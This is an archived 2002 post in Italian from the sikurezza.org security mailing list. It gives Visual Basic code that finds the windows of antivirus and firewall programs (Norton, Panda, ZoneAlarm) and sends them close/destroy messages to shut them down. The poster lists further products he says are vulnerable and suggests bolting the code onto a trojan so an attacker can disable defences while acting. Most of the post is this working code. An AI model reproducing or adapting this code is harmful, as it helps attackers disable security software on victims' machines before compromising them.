Morte degli antivirus e dei Firewall

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]

Archivio: Febbraio 2002 ml@sikurezza.org
Soggetto: Morte degli antivirus e dei Firewall
Mittente: NeMeS||y
Data: 18 Feb 2002 09:05:33 -0000

Saluti a tutti,
ho acquistato ultimamente un giornale, ed un articolo, parlava della
possibilità di killare, sotto windows, gli antivirus con molta semplicità
utilizzando un API in particolare e tutto questo con poche righe di codice.
Le case produttrici di AV hanno ritenuto questo bug irrisorio... tranne AVP
che ha provveduto a rilasciare una patch. Per curiosità ho scritto due righe
di codice in VB utilizzando l'API in questione... il codice è il seguente :

--
Const WM_CLOSE = &H10

Private Declare Function FindWindowA Lib "user32" _
    (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Integer

Private Declare Function SendMessageA Lib "user32" _
    (ByVal hWnd As Integer, ByVal wMsg As Integer, _
    ByVal wParam As Integer, lParam As Any) As Long

Private Function Killer(hWnd&)
    Dim Res&
    Res = SendMessageA(hWnd, WM_CLOSE, 0, 0)
    Res = SendMessageA(hWnd, WM_DESTROY, 0, 0)
End Function

Private Sub Form_Load()
  Dim hWnd&
    hWnd = FindWindowA(vbNullString, "Navapw32")
    Killer (hWnd)
    hWnd = FindWindowA(vbNullString, "Panda Antivirus 6.0 Platinum")
    Killer (hWnd)
End Sub

--

... Non fate caso ai nomi delle funzioni mi sono lasciato trasportare =)
ho aggiunto una piccolezza rispetto ad altro codice che ho letto, che è
"FindWindowA" semplicemente va a ricercare i parametri dell'applicazione da
"contattare" in base al nome della stessa...

Cosa accade... semplicemente si fa credere all'antivirus che windows sta per
terminare la sessione e quindi gli si chiede ( SendMessageA ) gentilmente di
andare a fare... insomma di tornare da dove è venuto =)

La cosa carina è che lo stesso accade con i firewall (ho testato solo
ZoneAlarm).. lo si puo testare aggiungendo nel Form_Load :

hWnd = FindWindowA(vbNullString, "Zonealarm")
Killer (hWnd)

L'ultima versione di panda è ancora "vulnerabile", mentre norton ( anche
avendo ritenuto tutto ciò irrisorio ) nell'ultima versione dopo aver
effettuato l'update ciò non accade...

altri AV sono risultati vulnerabili (non testati da me personalmente) come :

AVP
F-Prot
McAfee
Pc Cillin 2002 NT Version

lascio a voi le considerazioni... anche se io credo che il problema abbia
una certa rilevanza, dato che con qualche artificio magari si puo collegare
il tutto ad un trojan di vecchio stampo, e quindi dargli la possibilità di
disattivare l'AV e magari anche il firewall giusto per il tempo che serve
all'attacker di fare cio che vuole...
insomma potrebbe essere un modo per dar sfogo alla fantasia =)

Fatemi sapere cosa ne pensate..

bye
 -NeM


________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Messaggi successivi:
- Re: Morte degli antivirus e dei Firewall, Sorrow The Prince
- Re: Morte degli antivirus e dei Firewall, Raistlinmage

In risposta a:
- R: ISP e caller-ID, programmers
- Re: ISP e caller-ID - un poco OT ?, Ing. S. Centineo AMAP S.p.A.

Data:
- precedente: Fw: ACM TechNews, Raistlin
- successivo: Interoperabilita' di FreeS/WAN con altri prodotti, Mimmus
- indice

Argomento:
- precedente: Re: ISP e caller-ID - un poco OT ?, Ing. S. Centineo AMAP S.p.A.
- successivo: Re: Morte degli antivirus e dei Firewall, Raistlinmage
- indice

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005